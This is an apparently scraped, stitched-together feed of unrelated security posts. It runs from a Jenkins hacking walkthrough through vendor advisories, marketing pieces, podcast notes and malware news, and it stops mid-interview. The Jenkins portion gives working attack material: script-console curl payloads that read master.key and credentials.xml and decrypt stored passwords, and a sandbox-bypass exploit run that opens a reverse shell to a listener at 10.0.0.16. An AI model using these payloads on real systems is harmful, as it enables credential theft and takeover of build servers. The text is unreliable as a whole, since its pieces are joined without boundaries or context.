Also because this syntax took me a minute to figure out for files in subdirectories:
curl -u admin:admin http://10.0.0.160:8080/scriptText --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+/c+type+secrets%5C\master.key%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run"
curl -u admin:admin http://10.0.0.160:8080/scriptText --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cat+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run"
Then to decrypt any passwords:
curl -u admin:admin http://10.0.0.160:8080/scriptText --data "script=println(hudson.util.Secret.fromString('7pXrOOFP1XG62UsWyeeSI1m06YaOFI3s26WVkOsTUx0=').getPlainText())"
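Hand-encoding those Groovy payloads for curl is error-prone, so it can help to generate them; here is a minimal Python sketch (the host, credentials, and secret string are placeholders taken from the examples above):

```python
# Build the form body for Jenkins' /scriptText endpoint by URL-encoding an
# arbitrary Groovy script, instead of hand-encoding it like the curl examples.
from urllib.parse import urlencode

def script_text_body(groovy_script: str) -> str:
    """Return an application/x-www-form-urlencoded body for /scriptText."""
    return urlencode({"script": groovy_script, "Submit": "Run"})

# Same decrypt one-liner as the curl example, with a placeholder secret:
groovy = "println(hudson.util.Secret.fromString('AAAA').getPlainText())"
body = script_text_body(groovy)
print(body)
# POST it with basic auth, e.g.:
#   curl -u admin:admin http://10.0.0.160:8080/scriptText --data "$body"
```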
If you are in a position where you have the files but no access to Jenkins, you can use:
There is a small bug in the Python script when it does the regex, and I haven't bothered to fix it at the time of this post. But here is a version where, instead of the regex, I'm just printing out the values so you can see the decrypted password. The change is on line 55.
Edit 4 March 19: the script only regexes for passwords (line 72); you might need to swap out the regex if there are SSH keys or other secrets...read the credentials.xml file :-)
Emmanuel Tacheau of Cisco Talos discovered this vulnerability.
Executive summary
Antenna House Rainbow PDF Office Server Document Converter contains a heap overflow vulnerability that could allow an attacker to remotely execute code on the victim machine. Rainbow PDF is a software solution that converts Microsoft Office documents into PDFs. This specific flaw lies in the way the software converts PowerPoint files into PDFs.
In accordance with our coordinated disclosure policy, Cisco Talos worked with Antenna House to ensure that these issues are resolved and that an update is available for affected customers.
Vulnerability details
Antenna House Rainbow PDF Office Server Document Converter getSummaryInformation NumProperties code execution vulnerability (TALOS-2018-0780/CVE-2019-5019)
A heap overflow vulnerability exists in the PowerPoint document conversion function of Rainbow PDF Office Server Document Converter V7.0 Pro R1 (7,0,2018,1113). While parsing the Document Summary Property Set stream, the getSummaryInformation function incorrectly checks the correlation between the size and the number of properties in PropertySet packets, causing an out-of-bounds write that leads to heap corruption and, ultimately, code execution.
Read the complete vulnerability advisory here for additional information.
Versions tested
Talos tested and confirmed that Antenna House Rainbow PDF, version 7.0 Pro R1 for Linux64 (7,0,2018,1113) is impacted by this vulnerability.
Coverage
The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.
Snort Rules: 49209, 49210
Employees use their mobile devices to be proactive and stay connected in both their personal and work lives. The movement to the cloud has allowed employees to check email, download documents, and share information that may contain sensitive information, even when they’re not on an enterprise network. Businesses must protect their enterprise environments and combat threats that target their employees as average consumers.
McAfee research shows that every mobile-enabled device is subject to some type of malicious exploit. In 2018, McAfee researchers discovered mobile malware named TimpDoor, which turned Android devices into hidden proxies. But in 2019, businesses should be prepared for malware that goes beyond mobile devices too.
Detections of backdoors, cryptomining, fake apps, and banking Trojans all increased substantially in the second half of 2018, and attacks on other connected household devices gained momentum as well. While hidden apps and adware remain by far the most common forms of mobile malware, other categories are growing and learning how to infect other types of devices.
Mobile devices are becoming a hub for ransomware and malware developers. One common thread through much of the mobile attack landscape is the quest for illicit profits. Criminals are looking for ways to maximize their income and shift tactics in response to changes in the market.
“75% rise in banking Trojans, enabling cybercriminals to steal financial credentials from mobile devices”
“550% increase in mobile malware realized by the end of 2018”
Weak to non-existent security controls from manufacturers, combined with users' failure to take simple protective measures such as changing the default username and password, make connected devices in the home and workplace targets for cybercriminals.
Although mobile devices have become key enablers for business productivity and connectivity, they’re still the greatest risk to enterprises today. This changes how enterprises need to secure the mobile devices that connect to their environment. Enterprises must invest in endpoint security solutions to protect themselves from the evolving threat landscape. Mobile is one of the fastest growing endpoints and needs to be protected just as much as laptops and desktop computers.
McAfee has addressed the growing need by introducing the MVISION portfolio family, which provides IT administrators with comprehension and control through one single management console. McAfee MVISION Mobile provides on-device detection, local (end user) threat remediation, visual mapping of nearby dangerous networks, customizable on-device user notifications, and advanced threat detection. This provides the enterprise-class threat defense that businesses today need to be secure.
Read the McAfee Mobile Threat Report to learn more about protecting your employees’ mobile devices from malware and other cyberthreats.
The post Mobile Threat Report Commentary: Mobile Malware is Not Going Away appeared first on McAfee Blogs.
The service became notorious for its use by ne’er-do-wells looking to make a quick buck by hijacking the processing power of victim machines to generate virtual money.
The post Coinhive cryptocurrency miner to call it a day next week appeared first on WeLiveSecurity
On February 25, 2019, the European Data Protection Board (the “EDPB”) issued a statement regarding the transfer of personal data from Europe to the U.S. Internal Revenue Service (the “IRS”) for purposes of the U.S. Foreign Account Tax Compliance Act (“FATCA”).
Enacted in 2010, FATCA requires that foreign financial institutions report information about financial accounts and assets held by their U.S. account holders to the IRS. Such institutions are required to register directly with the IRS to comply with FATCA or comply with intergovernmental agreements signed between the foreign country and the U.S. government. FATCA was designed to combat tax evasion by U.S. persons holding accounts and other financial assets offshore.
The EDPB issued the statement in response to a July 2018 Resolution passed by the European Parliament on the adverse effects of FATCA on EU citizens and in particular “accidental Americans,” and a February 2018 letter addressed to the Article 29 Working Party on behalf of European “accidental Americans.” (The term “accidental American” refers to an individual who by “accident” of birth inherited U.S. citizenship, but who maintains no connection to the U.S. having never lived, worked or studied there, or who does not hold a U.S. Social Security number.) By its Resolution, the European Parliament calls on the EDPB to investigate any infringement of EU data protection rules by EU Member States whose legislation permits the transfer of personal data to the U.S. for purposes of FATCA, and to initiate infringement procedures against Member States that fail to adequately enforce EU data protection rules.
In its statement, the EDPB announced that it will consider Parliament’s request. The EDPB also noted that it is currently preparing guidelines on data transfer tools provided for by the EU General Data Protection Regulation (“GDPR”)—specifically, guidelines discussing transfer tools based on safeguards provided for by Articles 46(2)(a) and 46(3)(b) of the GDPR. The guidelines will also elaborate on the safeguards themselves; they will touch on minimum guarantees to be included in legally binding and enforceable instruments concluded between public authorities and bodies (per Article 46(2)(a)) and provisions to be inserted into administrative arrangements between public authorities or bodies which include enforceable and effective data subject rights (per Article 46(3)(b)).
The guidelines will provide a useful tool for evaluating the FATCA intergovernmental agreements signed between EU Member States and the U.S. government to ensure that they comply with the GDPR.
Threats are constantly evolving and, just like everything else, tend to follow certain trends. Whenever a new type of threat is especially successful or profitable, many others of the same type will inevitably follow. The best defenses need to mirror those trends, so companies get the most robust protection against the newest wave of threats.
Our goal with these reviews is to discover how cutting-edge cybersecurity software fares against the latest threats, hopefully helping you to make good technology purchasing decisions. We'll explain how these new and trending cybersecurity tools work, who they're for, and where they fit into a security architecture.
If you want to hack your way into an old iPhone, you can get hold of a law enforcement-grade system to do just that for a bargain price on eBay.
I think that’s a crime
I can’t stress this enough.
The very existence of tools like these is a threat to every smartphone user. That's because no matter how many times people argue that these solutions will be used only by law enforcement, these things always proliferate.
The fact that Cellebrite systems, which law enforcement was until recently spending heavily on acquiring, are now available on the open market for as little as $100 is a perfect illustration of this.
Cybersecurity is about people. The frontline defenders who stand between the promise of digital transformation and the daily reality of cyber-attacks need our help. At Microsoft, we’ve made it our mission to empower every person and organization on the planet to achieve more. Today that mission is focused on defenders. We are unveiling two new cloud-based technologies in Microsoft Azure Sentinel and Microsoft Threat Experts that empower security operations teams by reducing the noise, false alarms, time consuming tasks and complexity that are weighing them down. Let me start by sharing some insight into the modern defender experience.
Every day Microsoft security professionals help organizations respond to threats at scale and through targeted incident response. In one recent example from the latest Security Intelligence Report, Microsoft experts were called in to help several financial services organizations deal with attacks launched by a state-sponsored group that had gained administrative access and executed fraudulent transactions, transferring large sums of cash into foreign bank accounts. When the attack group realized they had been detected, they rapidly deployed destructive malware that crippled the customers’ operations for several days. Microsoft experts were on site within hours, working around the clock with the customers’ security teams to restore normal business operations.
Incidents like this are a reminder that many defenders are overwhelmed by threats and alerts – often spending their days chasing down false alarms instead of investigating and solving complex cases. Compounding the problem is a critical shortage of skilled cyber defenders, with an estimated shortfall of 3.5 million security professionals by 2021. With today’s announcements we are unlocking the power of the cloud and AI for security to do what they do best—reason over vast amounts of security signal, spot anomalies and bring global scale to highly trained security professionals.
Too many enterprises still rely on traditional Security Information and Event Management (SIEM) tools that are unable to keep pace with the needs of defenders, volume of data or the agility of adversaries. The cloud enables a new class of intelligent security technologies that reduce complexity and integrate with the platforms and productivity tools you depend on. Today we are pleased to announce Microsoft Azure Sentinel, the first native SIEM within a major cloud platform. Azure Sentinel enables you to protect your entire organization by letting you see and stop threats before they cause harm. With AI on your side it helps reduce noise drastically—we have seen an overall reduction of up to 90 percent in alert fatigue with early adopters. Because it’s built on Azure you can take advantage of nearly limitless cloud speed and scale and invest your time in security and not servers. In just a few clicks you can bring in your Microsoft Office 365 data for free and combine it with your other security data for analysis.
Azure Sentinel is the product of Microsoft’s close partnership with customers on their journey to digital transformation. We worked hand in hand with dozens of customers and partners to rearchitect a modern security tool built from the ground up to help defenders do what they do best – solve complex security problems. Early adopters are finding that Azure Sentinel reduces threat hunting from hours to seconds.
Corey McGarry, Senior Technical Specialist, Enterprise Operations, Tolko Industries, Ltd., told me, “After using Microsoft Azure Sentinel for six months, it has become a go-to resource every morning. We get a clear visual of what’s happening across our network without having to check all our systems and dashboards individually. I haven’t seen an offering like Microsoft Azure Sentinel from any other company.”
Azure Sentinel supports open standards such as Common Event Format (CEF) and broad partner connections, including Microsoft Intelligent Security Association partners such as Check Point, Cisco, F5, Fortinet, Palo Alto Networks and Symantec, as well as broader ecosystem partners such as ServiceNow. You can even bring your own insights and collaborate with a diverse community of defenders. Azure Sentinel blends the insights of Microsoft experts and AI with the unique insights and skills of your own in-house defenders and machine learning tools to uncover the most sophisticated attacks before they take root. Azure Sentinel helps empower SecOps teams to keep their organizations safe by harnessing the power, simplicity and extensibility of Azure to analyze data from Microsoft 365 and security solutions from other vendors. Azure Sentinel is available in preview today from the Azure portal.
Our approach to security is not only about applying the cloud and AI to your scale challenges, but also making the security operations experts who defend our cloud available to you. Therefore, we are pleased to announce Microsoft Threat Experts, a new service within Windows Defender ATP which provides managed hunting to extend the capability of your security operations center team. Through this service, Microsoft will proactively hunt over your anonymized security data for the most important threats, such as human adversary intrusions, hands-on-keyboard attacks, and advanced attacks like cyberespionage—helping your team prioritize the most important risks and respond quickly. The service also provides world-class expertise on demand. With the new “Ask a Threat Expert” button, your security operations team can submit questions directly in the product console. To join the public preview of Microsoft Threat Experts, apply in the Windows Defender ATP settings.
There are no easy answers or silver bullets for security; however, the cloud is unlocking new capabilities. This is why we are putting the cloud and AI to work to extend and empower the defenders whose unique human insights are key to avoiding cyber threats. Azure Sentinel and Microsoft Threat Experts are two new capabilities that join our broad portfolio of security solutions across identity, endpoints, data, cloud applications and infrastructure. We look forward to showcasing Azure Sentinel and Microsoft Threat Experts at the RSA Conference next week and encourage you to stop by the Microsoft booth on the main show floor or any of our compelling sessions to learn more.
The post Announcing new cloud-based technology to empower cyber defenders appeared first on The Official Microsoft Blog.
Researchers uncovered the flaw in 2016 - but Microsoft still hasn't rolled out patches to protect users of Windows 10
Algorithm equalises power-draw making side-channel attacks harder to execute
Baseboard management controllers give administrators remarkable control over servers inside data centres
Why is Tampa’s mayor tweeting about blowing up the airport? Are hackers trying to connect with you via LinkedIn? And has Maria succeeded in her attempt to survive February without Facebook?
All this and much much more in the latest edition of the “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Maria Varmazis.
Plus, after last week’s discussion about the legal battle between Mondelez and Zurich Insurance, we have a chat with security veteran Martin Overton to take a deeper look into cyberinsurance.
On this week’s show Adam and Patrick discuss the week’s security news:
- Cyber Command kicks the IRA off the Internet on election day
- WSJ reporting on Iran vs Australia likely incorrect
- Two Russian cybersecurity professionals sentenced over treason
- DPRK spearphishing US summit participants
- LOTS of technical news and research this week
This week’s show is brought to you by Remediant. Their CEO Tim Keeler will be along in this week’s sponsor segment to talk about how they’re doing “virtual directory binding” to make managing Linux accounts via Active Directory less traumatic. If you’re struggling with horrible, horrible PAM solutions in your devops environments have a listen to that one.
*** NOTE FROM PAT: I made some mistakes in the recording phase of this week’s show. As a result, my vocal audio is pretty atrocious. Sorry! ***
- Cyber Command put the kibosh on Russian trolls during the midterms
- Iranian Group Blamed for Cyberattack on Australia’s Parliament - WSJ
- China, not Iran, still the main suspect in hacking of Australia's political parties, say sources
- Former Russian Cybersecurity Chief Sentenced to 22 Years in Prison — Krebs on Security
- North Korean hackers go on phishing expedition before Trump-Kim summit
- Supermicro hardware weaknesses let researchers backdoor an IBM cloud server | Ars Technica
- The Missing Security Primer for Bare Metal Cloud Services – Eclypsium
- The secret lives of Facebook moderators in America - The Verge
- CRXcavator: Democratizing Chrome Extension Security | Duo Security
- Toyota Australia says no customer data taken in attempted cyber attack | Business | The Guardian
- Toyota Australia hack update | Automotive Industry News | just-auto
- Many websites threatened by highly critical code-execution bug in Drupal | Ars Technica
- It took hackers only three days to start exploiting latest Drupal bug | ZDNet
- Former Hacking Team Members Are Now Spying on the Blockchain for Coinbase - Motherboard
- For many crooks, malware is out and PowerShell attacks are in, IBM says
- New flaws in 4G, 5G allow attackers to intercept calls and track phone locations | TechCrunch
- Cryptocurrency wallet caught sending user passwords to Google's spellchecker | ZDNet
- POS firm says hackers planted malware on customer networks | ZDNet
- Surveillance firm asks Mozilla to be included in Firefox's certificate whitelist | ZDNet
- New browser attack lets hackers run bad code even after users leave a web page | ZDNet
- WinRAR versions released in the last 19 years impacted by severe security flaw | ZDNet
- Dow Jones’ watchlist of 2.4 million high-risk clients has leaked | TechCrunch
- Intel open-sources HBFA app to help with firmware security testing | ZDNet
- Thunderclap flaws impact how Windows, Mac, Linux handle Thunderbolt peripherals | ZDNet
- Spain investigates raid on North Korean embassy: sources | Reuters
- Conference | 0xCC | Melbourne
A vulnerability in the update service of Cisco Webex Meetings Desktop App and Cisco Webex Productivity Tools for Windows could allow an authenticated, local attacker to execute arbitrary commands as a privileged user.
The vulnerability is due to insufficient validation of user-supplied parameters. An attacker could exploit this vulnerability by invoking the update service command with a crafted argument. An exploit could allow the attacker to run arbitrary commands with SYSTEM user privileges.
While the CVSS Attack Vector metric denotes the requirement for an attacker to have local access, administrators should be aware that in Active Directory deployments, the vulnerability could be exploited remotely by leveraging the operating system remote management tools.
Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
This advisory is available at the following link:
Security Impact Rating: High
While not totally related to the blog post and tweet, the following exploit came up while searching.
What I have figured out is important here is the plugin versions, as they relate to this latest round of Jenkins exploits. TBH I never paid much attention to the plugins in the past, as the issues have been with core Jenkins (as was the first blog post), but you can get a look at them by going to jenkins-server/pluginManager/installed
|Jenkins plugin manager|
|No permissions for Jenkins plugin manager|
AFAIK you can't enumerate installed plugins and their versions without (elevated) authentication, like you can with things like WordPress. If you know how, please let me know. For the time being I guess it's just throwing things to see what sticks.
As I mentioned, these latest vulns are issues with installed Jenkins plugins. Taking a look at CVE-2019-1003000 (https://nvd.nist.gov/vuln/detail/CVE-2019-1003000), we can see that it affects the Script Security Plugin (the nist.gov entry says 2.49, but it's a typo and should be 1.49), as seen in the Jenkins advisory https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266
An exploit for the issue exists and is available here: https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc. It even comes with a Docker config to spin up a vulnerable version to try it out on. What's important about this particular exploit is that it IS post-auth, but it doesn't require script permissions, only Overall/Read and Job/Configure permissions.
I'm seeing more and more servers/admins (rightfully) block access to the script & scriptText consoles because it's well documented that they offer immediate RCE.
|no script permission|
A flaw was found in Pipeline: Declarative Plugin before version 1.3.4.1, Pipeline: Groovy Plugin before version 2.61.1, and Script Security Plugin before version 1.50.
This PoC uses a user with Overall/Read and Job/Configure permissions to execute a maliciously modified build script in sandbox mode, and tries to bypass the sandbox limitations in order to run arbitrary scripts (in this case, executing a system command).
As background: Jenkins's pipeline build scripts are written in Groovy. A build script is compiled and executed on the Jenkins master or a node, and contains the definition of the pipeline, e.g. what to do on slave nodes. Jenkins can also execute the script in sandbox mode. In sandbox mode, all dangerous functions are blacklisted, so a regular user cannot do anything malicious to the Jenkins server.
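The sandbox idea (intercept each call and refuse anything not explicitly allowed) can be sketched with a toy interceptor. This is only a Python analogy, not how the Groovy sandbox is actually implemented, and the allowlist contents are hypothetical:

```python
# Toy illustration of call-interception sandboxing: every function call is
# checked against an allowlist before it runs. Jenkins' Groovy sandbox
# intercepts method calls in a similar spirit.
ALLOWED_CALLS = {"echo", "sleep"}  # hypothetical allowlist of safe pipeline steps

class SandboxViolation(Exception):
    """Raised when a script tries to call something outside the allowlist."""

def sandboxed_call(name, func, *args):
    """Run func only if its name is on the allowlist."""
    if name not in ALLOWED_CALLS:
        raise SandboxViolation(name + " is not allowed in sandbox mode")
    return func(*args)

sandboxed_call("echo", print, "building...")             # permitted step
try:
    sandboxed_call("execute", print, "cat /etc/passwd")  # blocked step
except SandboxViolation as err:
    print("blocked:", err)
```

The bypass in this PoC works by getting code to run during script compilation, before such per-call checks ever apply.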
Running the exploit:
python2.7 exploit.py --url http://localhost:8080 --job my-pipeline --username user1 --password user1 --cmd "cat /etc/passwd"
[+] connecting to jenkins...
[+] crafting payload...
[+] modifying job with payload...
[+] putting job build to queue...
[+] waiting for job to build...
[+] restoring job...
[+] fetching output...
Started by user User 1
Running in Durability level: MAX_SURVIVABILITY
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
[Pipeline] End of Pipeline
You can certainly pull a reverse shell with it as well.
python2.7 exploit.py --url http://localhost:8080 --job my-pipeline --username user1 --password user1 --cmd "bash -i >& /dev/tcp/10.0.0.16/4444 0>&1"
[+] connecting to jenkins...
[+] crafting payload...
[+] modifying job with payload...
[+] putting job build to queue...
[+] waiting for job to build...
[+] restoring job...
[+] fetching output...
Started by user User 1
Running in Durability level: MAX_SURVIVABILITY
and you get:
nc -l 4444 -vv
bash: cannot set terminal process group (7): Not a tty
bash: no job control in this shell
The TL;DR: you can use this exploit to get a shell if an older version of the Script Security Plugin is installed and you have Overall/Read and Job/Configure permissions, which a regular Jenkins user is more likely to have, and it doesn't require the script console.
Veracode Software Composition Analysis now also scans Docker containers and images to find vulnerabilities associated with open source libraries as dependencies of the base OS image and globally installed packages. If you’re interested in understanding how containers work, the different components that make up your container ecosystem, and how that differs from virtualization, we recommend this great overview by Docker.
Do containers introduce new risks?
Containers can introduce new risks to your application due to the installation of a base OS image that you may not have used without the container, but they can also give you greater access and knowledge earlier in the development process. The image itself will often depend on numerous open source libraries that can introduce new vulnerabilities to your application. In addition, containers allow you to install packages at the global level, which previously may not have been accessible to vulnerability scans. It’s also not uncommon for developers to build applications in different environments than what is in production, meaning any vulnerability scans in development may not mirror what is in production. By containerizing applications, developers are able to build in the same environment as the final production platform, allowing them to conduct vulnerability scans on a production-ready image.
Simply using containers isn’t the security risk – it’s not knowing which open source libraries are installed and the vulnerabilities they may present.
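Conceptually, scanning those globally installed packages boils down to taking the container's package inventory (e.g. what `rpm -qa` would report) and matching it against a vulnerability feed. A toy sketch; the feed entries and version logic are illustrative only (real scanners use the package manager's own comparison algorithm):

```python
# Toy vulnerability feed: (package, first_fixed_version, advisory). Illustrative data.
VULN_DB = [
    ("openssl", (1, 0, 2, 20), "CVE-2019-XXXX"),
    ("bash",    (4, 2, 47),    "CVE-2014-6271"),
]

def parse_version(v):
    """'4.2.46-31' -> (4, 2, 46); naive, ignores the release suffix."""
    return tuple(int(x) for x in v.split("-")[0].split(".") if x.isdigit())

def scan(installed, vuln_db):
    """installed: {name: version-string}; returns findings for outdated packages."""
    findings = []
    for name, fixed, advisory in vuln_db:
        if name in installed and parse_version(installed[name]) < fixed:
            findings.append((name, installed[name], advisory))
    return findings

# Inventory as it might come out of the image's package database:
inventory = {"bash": "4.2.46-31", "openssl": "1.1.1-8"}
print(scan(inventory, VULN_DB))  # [('bash', '4.2.46-31', 'CVE-2014-6271')]
```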
How does Veracode secure containers?
Securing your container infrastructure is a huge undertaking that isn’t always clearly defined. Every layer of the container infrastructure can introduce risks, including the hardware, host OS, kernel, Docker engine, registry, base OS image, globally installed packages, and the application. Look to your existing set of vendors and solutions to address each one of them in the same way that you’re addressing OS vulnerabilities on the rest of the network.
As an application security company, Veracode is focused on the application, the base OS image, and the globally installed packages.
Securing containers from open source vulnerabilities isn’t all that different from looking at vulnerabilities in open source libraries in your code. You need to be able to scan your container the moment it’s introduced, with all of its globally installed packages. This enables your development team to decide whether they want to proceed forward with the vulnerabilities present, introduce ways to mitigate the issues, update to a more secure version of the libraries being used, or explore alternative base images and libraries that are more secure.
Divide and conquer: vulnerabilities in application code vs. base OS image
To limit complexity, and to avoid waiting for all applications to be “Dockerized,” Veracode recommends that you divide and conquer the security of the application itself and the security of the container and its dependencies:
- Scan your code before you package it up in a container – fix all of the third-party vulnerabilities, and the flaws found in your first-party code.
- Once your application/code is in a state that is acceptable for production, containerize the application in your pipeline, and then run an open source security scan against the container itself.
Veracode Software Composition Analysis finds vulnerabilities in the base OS image and runtime dependencies
Veracode Software Composition Analysis now looks for vulnerabilities associated with open source libraries as dependencies of the base OS image (CentOS/RHEL) and any packages globally installed with the YUM package manager in a Docker container.
Containers are scanned automatically via an agent in the developer’s CI system, or manually in a developer’s CLI. You can scan your application prior to the containerization and the container itself separately. This provides a clear inventory of all of the dependencies and associated vulnerabilities before pushing it to production.
Finally, Veracode Software Composition Analysis keeps a history of what’s in the container and alerts you to new vulnerabilities, removing the requirement of rescanning the container unless you change its dependencies.
To learn more about open source libraries, and direct vs. indirect dependencies, read the Understanding Your Open Source Risk ebook.
Researchers discovered new Trojan malware written in Golang that’s targeting e-commerce websites with brute-force attacks.
In their investigation, Malwarebytes researchers found a connection between the compromised e-commerce website and a two-stage payload. The first stage consisted of a Delphi downloader detected as Trojan.Wallyshack. This threat collected basic information about the infected machine, transmitted the data to its command-and-control (C&C) server and ran Trojan.StealthWorker.GO, the second payload that communicated with the infected site. Written in Golang version 1.9, this malware sample contained several functions with the name “Brut” that it used for brute-forcing.
Connections to MageCart and the Rise of Golang Threats
While analyzing the infected website, Malwarebytes observed that this wasn't the first time googletagmanager[.]eu has surfaced in an attack campaign. In fact, researchers traced the domain back to criminal activities involving MageCart. This threat actor has affected more than 800 organizations by compromising their e-commerce websites and stealing customers' payment card details, as noted by RiskIQ.
At the same time, this brute-forcer comes amid a rise of Golang-based digital threats. In January 2019, for example, Malwarebytes Labs detected Trojan.CryptoStealer.Go, an information stealer written in this budding programming language. Just a month before, researchers at Palo Alto Networks’ Unit 42 came across a Golang variant of Zebrocy, an attack tool used by the Sofacy threat group.
How Security Teams Can Defend Against Brute-Forcers
Security professionals can help defend against brute-force attacks by shielding their network perimeter against outside intrusion with firewalls and identity-based security such as identity and access management (IAM). Additionally, security teams should implement consistent software patching so they can close off known vulnerabilities.
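Beyond perimeter controls, a basic application-side defense against brute-forcing is throttling repeated failed logins. A minimal sliding-window lockout sketch; the window and threshold values are arbitrary:

```python
import time
from collections import defaultdict, deque

WINDOW = 300     # seconds to remember failed attempts
THRESHOLD = 5    # failures within the window before lockout

failures = defaultdict(deque)

def record_failure(user, now=None):
    """Log a failed login and drop attempts older than the window."""
    now = time.time() if now is None else now
    q = failures[user]
    q.append(now)
    while q and now - q[0] > WINDOW:
        q.popleft()

def is_locked(user, now=None):
    """True once the user has THRESHOLD failures inside the window."""
    now = time.time() if now is None else now
    q = failures[user]
    while q and now - q[0] > WINDOW:
        q.popleft()
    return len(q) >= THRESHOLD

# Simulate a burst of failed logins:
for t in range(5):
    record_failure("admin", now=1000 + t)
print(is_locked("admin", now=1005))  # True
print(is_locked("admin", now=2000))  # False: failures aged out of the window
```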
The post New Golang Brute-Forcer Targeting E-Commerce Sites to Steal Personal and Payment Data appeared first on Security Intelligence.
Security researchers discovered that a threat actor is targeting LinkedIn users with fake job offers to deliver the More_eggs backdoor.
Since mid-2018, Proofpoint has observed various campaigns distributing More_eggs, each of which began with a threat actor creating a fraudulent LinkedIn profile. The attacker used these accounts to contact targeted employees at U.S. companies — primarily in retail, entertainment, pharmaceuticals and other industries that commonly employ online payments — with a fake job offer via LinkedIn messaging.
A week after sending these messages, the attacker contacted the targeted employees directly using their work email to remind them of their LinkedIn correspondence. This threat actor incorporated the targets’ professional titles into subject lines and sometimes asked recipients to click on a link to a job description. Other times, the message contained a fake PDF with embedded links.
These URLs all pointed to a landing page that spoofed a legitimate talent and staffing management company. There, the target received a prompt to download a Microsoft Word document that downloaded the More_eggs backdoor once macros were enabled. Written in JScript, this backdoor malware is capable of downloading additional payloads and profiling infected machines.
A Series of Malicious Activities on LinkedIn
The threat actor responsible for these campaigns appears to have had a busy 2019 so far. Proofpoint found ties between these operations and a campaign first disclosed by Krebs on Security in which phishers targeted anti-money laundering officers at U.S. credit unions. Specifically, the security firm observed similar PDF email attachments and URLs all hosted on the same domain.
This isn’t the first time an online actor has used LinkedIn for malicious activity, either. Back in September 2017, Malwarebytes Labs found evidence of attackers compromising peoples’ LinkedIn accounts and using them to distribute phishing links via private messages. Less than a year later, Alex Hartman of Network Solutions, Inc. disclosed a similar campaign in which threat actors attempted to spread malware via LinkedIn using fake business propositions.
How to Defend Against Backdoors Like More_eggs
Security professionals can help defend against backdoors like More_eggs by consistently monitoring endpoints and devices for suspicious activity. Security teams should simultaneously use real-time compliance rules to automate remediation in the event they observe behavior that appears to be malicious.
Additionally, experts recommend testing the organization’s phishing defenses by contacting a reputable penetration testing service that employs the same tactics, techniques and procedures (TTPs) as digital criminals.
The post Threat Actor Using Fake LinkedIn Job Offers to Deliver More_eggs Backdoor appeared first on Security Intelligence.
When it comes to breaches, we have seen this time and again: an exploited vulnerability that costs organizations millions of dollars, and consumers their private data. Zero-day vulnerabilities are software flaws or bugs that are unknown to the software developers and don't yet have a patch, providing a perfect opportunity for an enterprising hacker to create an "exploit," a type of malware specifically targeting these software vulnerabilities.
In fact, nearly 60 percent of organizations report they've been breached due to an unpatched vulnerability. Whether a lone wolf or a nation-state takes advantage of these vulnerabilities, the results could be catastrophic.
Vulnerabilities and Threat Actors
Data breaches caused by zero-day and one-day vulnerabilities are likely ones that have already affected your organization. In 2017, Equifax revealed that a breach had exposed the personally identifiable information (PII) of 148 million Americans. The cause of the breach? Out-of-date software that went unnoticed for 76 days. All it takes is one bad actor finding these vulnerabilities.
One of the earliest examples of a zero-day vulnerability is a worm, now widely known as Stuxnet, that infected Iranian nuclear plants. The worm slowed down the centrifuges in the plants, eventually shutting them down completely. Upon investigation, it was concluded that only a nation-state could be capable of such a large-scale attack with such dire consequences. Vulnerabilities and exploits like these hit every industry vertical, leaving no enterprise safe. Understanding whether your organization is targeted in these types of attacks is crucial.
One lone-wolf actor, Luxor2008, was discovered selling one-day software exploits on Russian Dark Web forums. A reputable seller of dangerous malware, Luxor2008 was offering it to other criminals at a price point of 10,000 USD. The specific exploit, for CVE-2018-8453, enables the user to bypass Supervisor Mode Access Prevention and goes undetected by security solutions like Kaspersky Total Security 2019. The nature of this exploit could cause serious damage, and because this actor sells on only one marketplace, it is difficult for law enforcement to catch him.
The Seemingly Simple Fix
These vulnerabilities are often easily fixed by patching and updating regularly; you know this, of course. It's part of the cybersecurity ABCs. So why don't more organizations patch and update regularly? Many organizations wait to apply patches to make sure they won't affect anything else on their systems. Often, end users of enterprise computer systems are not in control of patching and updating their computers; their IT department is. Updating systems may also void the system warranty or violate licensing terms, causing a delay in patching. However, this leaves the attack window open for a threat actor to take advantage of the vulnerability. The key to defending against these vulnerabilities? Anticipating the attacks before they occur with a tailored threat model.
When assessing your organization’s patch management cycle, it is necessary for your security experts to prioritize the deployment of patches and updates. With different patches posing distinct challenges, understanding the motives behind threats as well as the relevancy of the threat to your organization is paramount to your security.
It's not enough to just know about threat actors and unpatched vulnerabilities. These vulnerabilities need to be put into the context of your organization's security. From there, you can understand a) whether you are a given threat actor's target, and b) if so, whether you have sufficient security controls for that actor's specific TTPs; otherwise, that threat will likely be of high relevance to your organization. This is where risk scoring, gap analysis, and threat modeling become highly valuable to your security analysts.
Using a platform where you can create a tailored model of an adversary, then score that threat based on relevance helps analysts to pinpoint exactly the highest priority issues and where there are gaps in the organization’s security posture. LookingGlass’ ScoutThreat platform allows your analysts to do just that – create robust and tailored threat models, score those threats, and then perform gap analysis. Organizations can no longer afford to have a defensive strategy — learn more about LookingGlass ScoutThreat here.
The post Zero-Day Vulnerabilities: An Inside Look at Luxor2008 appeared first on LookingGlass Cyber Solutions Inc..
WANT A LARGE tasty plate of big data? For restaurants all over the world, the answer is yes, and they get it from Venga, a fast-paced start-up based in the trendy Union Market district of Washington, D.C. Founded in 2010, Venga gives businesses in the restaurant and fitness industries the ability to collect, track, and analyze guests' spending and visiting habits to create personalized experiences and repeat visits. Verisign sat down with co-founder Winston Lord to learn more:
Q: The idea of personalizing a guest’s experience, especially with dining, is so smart. How did the concept for Venga come about?
